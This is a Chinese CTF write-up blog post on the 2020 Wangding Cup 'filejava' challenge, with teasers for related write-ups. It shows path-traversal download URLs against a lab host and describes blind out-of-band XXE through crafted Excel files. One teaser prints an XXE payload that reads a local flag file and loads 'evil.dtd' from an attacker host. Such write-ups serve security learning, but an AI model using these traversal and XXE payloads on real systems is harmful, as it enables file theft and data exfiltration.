[网鼎杯 2020 青龙组] filejava

最新推荐文章于 2022-12-28 19:42:19 发布
最新推荐文章于 2022-12-28 19:42:19 发布
阅读量173 收藏
点赞数
文章标签: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/charai/article/details/124642160
版权

进去发现就是一个单纯的文件上传接口,试试功能,发现上传后的文件名会给出,还有一个下载连接,点开下载链接发现是这种格式的

http://7b576de9-dd31-4f71-b86d-0a8d5b6ff15f.node4.buuoj.cn:81/DownloadServlet?filename=e5ac31d0-6273-46bb-9863-d5f6d9105523_pwdTop500.txt

可以看见就是对于传入的参数进行下载,这里试试任意文件下载,了解javaweb的目录是

webapps/WEB-INF/classes/    #用于存放java字节码文件
webapps/WEB-INF/lib/    #用于存放该工程用到的库,例如servlet-api.jar等等
webapps/WEB-INF/web.xml    #web工程的配置文件,完成用户请求的逻辑名称到真正的servlet类的映射

目标是/WEB-INF/web.xml一层一层跳出试试

http://7b576de9-dd31-4f71-b86d-0a8d5b6ff15f.node4.buuoj.cn:81/DownloadServlet?filename=../../../../WEB-INF/web.xml

下载到了web.xml在里面看到了servlet的映射,然后去下载对应的.class文件

http://7b576de9-dd31-4f71-b86d-0a8d5b6ff15f.node4.buuoj.cn:81/DownloadServlet?filename=../../../../WEB-INF/classes/cn/abc/servlet/DownloadServlet.class

反编译后读取源码,首先是UploadServlet,在其中发现一个很突兀的代码

 

看看这行代码,在上传的文件中特殊对excel文件进行处理,搜索引擎找找excelorg.apache.poi.openxml4j,了解到Excel文件实际上只是XML文档的zip文件,且存在一个XXE漏洞,简单学习下后,配合无回显读取本地敏感文件(Blind OOB XXE)即可

 

坑点:

尽量不要用7-zip,使用zip -r ../excel-1.xlsx *命令

an5er
关注
[网鼎杯 2020 青龙 wp ]filejava
mutou990的博客
08-13 694
知识点 web.xml文件泄露 blind xxe 用到的工具: burpsuit或者hackbar都可以 审题 1打开题目如下 2随便上传一个文件,然后点击下载,抓包 看到有filename,猜测可能存在目录穿越以及任意文件下载 3尝试通过报错来获取网站的绝对路径,设置URL参数filename=../ 4爆出了绝对路径,路径里面有WEB-INF,题目提示与java有关,那应该是web.xml文件泄露,尝试读取,修改filename参数如下(…/数量随意写几个): filename=../../..
[网鼎杯 2020 青龙]AreUSerialz1详解两种常用方法及php伪协议扩展
最新发布
m0_73615178的博客
01-21 654
此方法内的代码逻辑,当我们需要它正确输出flag时此魔术方法调用后会接着正确调用此对象中的。不在if判断的范围内,所以将%00改为\00其也是代表空字符且浏览器不会自动解析。没有new对象,所以以下__construct()魔术方法不会触发,直接删除。根据经验及实验,我们简单构造的序列化值都属于这个ASCII码范围内,但是我们将构造的第一个序列化值get上传发现并不是flag,返回了,当$op值强比较===不等于str(2),弱比较==等于2。按照常规方法,首先,我们先将代码复制到本地进行序列化构造,
2020网鼎杯青龙)--WEB--FileJava(XXE)
a965527596的博客
05-17 2075
FileJava 1.打开题目,只有上传和下载的功能,可以上传任意文件和下载文件,但是不能访问,所以不能用一句话连接,在下载文件功能发现可以下载任意文件,于是将WEB-INF/web.xml页面下载下来,发现有上传和下载的配置文件,由2个类成,将这2个类下载下来。 <?xml version="1.0" encoding="UTF-8"?> -<web-app version="4.0" xsi:schemaLocation="http://xmlns.jcp.org/xml/n
[网鼎杯 2020 青龙]filejava
SopRomeo的博客
01-15 745
可以发现他的form表单传入的路径是/UploadServlet 明显就是一个Java类 经过测试尝试目录穿越 报错500 回显了一段前端,我们用脚本处理下 处理后爆出绝对路径 只要稍微学过一点java web的人都知道web.xml是java的配置文件 一般都在WEB-INF目录下 ../../../web.xml 成功读取到配置文件。以及各个类的路径 只要你搭过Tomcat服务器就知道这些类都在WEB-INF/classes目录下 把这些类全部下下来 ../../../classes/cn/.
2020网鼎杯青龙-filejava
box
08-25 319
网鼎杯 2020 青龙filejava 0x00 访问连接发现是个文件上传表单 尝试上传一个文件 发现上传之后可以下载 发现这个 url格式和常见的文件下载类似,可能存在下载漏洞。 尝试目录穿越下载 WEB-INF/web.xml文件,发现穿越四级目录即可 0x02 下载关键class文件 在web.xml配置文件中发现几个class文件 cn.abc.servlet.DownloadServlet 在网站目录对应 classes/cn.abc/servlet/DownloadServlet.cl
网鼎杯2020青龙——filejava通关思路
m0_61506558的博客
12-28 1329
1、启模式的解析器对象, DocumentBuilderFactory 是一个抽象工厂类,它不能直接实例化,但该类提供了newInstance()方法,这个方法会根据本地平台默认安装的解析器,自动创建一个工厂的对象并返回。驱动程序所必需的接口,其允许应用程序设置和查询解析器中的功能和属性、注册文档处理的事件处理程序,以及开始文档解析。在dnslog平台申请一个域名,点击上传会有数据外带,说明该程序存在漏洞,我们接下来就是要判断是有回显还是没有回显。因为使用了同一个接口,所以这两种方式的调用方法是完全一致的。
2020网鼎杯青龙Boom
05-12
【标题】"2020网鼎杯青龙Boom" 涉及的是一个网络安全竞赛的场景,其中"网鼎杯"是中国国内知名的网络安全技术大赛,旨在提升参赛者的网络安全技能和应急处理能力。"青龙"可能是比赛中的一个分或者阶段,可能...
2020网鼎杯青龙赛题.zip
05-10
比赛试题附件,其中包括misc,re,crypto,pwn,这些资源仅供学习参考,禁止用于盈利活动。希望大家可以合理利用,谢谢。
网鼎杯青龙18道.rar
06-11
【标题】"网鼎杯青龙18道.rar"是一个关于网络安全竞赛的资源压缩包,其中包含了2020网鼎杯青龙的比赛题目。网鼎杯是一项知名的网络安全技术竞赛,旨在提升参赛者的网络安全技能和实战能力,尤其针对青龙,...
2022年第三届“网鼎杯”网络安全大赛(青龙)部分题目附件
09-19
2022年第三届“网鼎杯”网络安全大赛(青龙)部分题目附件 2022年第三届“网鼎杯”网络安全大赛(青龙)部分题目附件 2022年第三届“网鼎杯”网络安全大赛(青龙)部分题目附件 2022年第三届“网鼎杯”网络...
Java安全-Java In CTF([网鼎杯 2020 青龙]filejava、[网鼎杯 2020 朱雀]Think Java
Love&Share
05-04 2326
文章目录[网鼎杯 2020 青龙]filejava[网鼎杯 2020 朱雀]Think Java [网鼎杯 2020 青龙]filejava 存在一个 UploadServlet 通过修改上传文件名,构造报错输出 web 目录 正常上传文件 /DownloadServlet?filename=ac6b647b-b31a-4ee7-8b86-9bbdba110a71_1.jpg 尝试任意文件读取,对于 Java 项目来说可以尝试读取 /WEB-INF/web.xml 配置文件 正常来说 web..
[CTF]网鼎杯2020-青龙-Web-FileJava-WriteUp
胖胖的ALEX
05-14 4430
一、赛题截图 二、做题思路 (1)查看源码,唯一有点用信息:./UploadServlet. (2)虽然题目名称和查看源码./UploadServlet都告诉这是一个JAVA程序,但建议还是访问/robots.txt,碰碰运气。 (3)随便上传一个dog.png图片,用Burpsuite抓包,发现新的URL地址:/DownloadServlet?filename=a6c672c9-a74c-4701-abfc-97d68e3c681d_dog.png (4)Burpsuite拦截下载文件请求URL,
2020网鼎杯---Java文件上传wp
Summer's blog
05-14 8092
前言 一篇文章读懂Java代码审计之XXE看过我这篇博客应该不难,没看过建议在看看。 题解 新建xxe.xlsx文件,修改后缀名xxe.zip解压。 修改[Content-Types].xml <!DOCTYPE ANY [ <!ENTITY % file SYSTEM "file:///flag"> <!ENTITY % remote SYSTEM "http://ip:8089/evil.dtd"> %remote; %all; ]> <root&
[网鼎杯 2020 青龙]bang
寻梦&之璐
05-18 6411
文章目录查壳:绑绑免费版脱壳:运行带壳的apkfrida-server监听运行脱壳脚本分析: 查壳: 绑绑免费版 脱壳: 运行带壳的apk frida-server监听 运行脱壳脚本 分析:
java对接青龙系统物流业务
12-23
青龙系统是一个专业的物流管理平台,而Java是一种广泛应用于企业级应用开发的编程语言。在对接青龙系统物流业务时,可以利用Java的强大功能和灵活性来实现各种业务需求。 首先,可以使用Java编写程序来与青龙系统...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值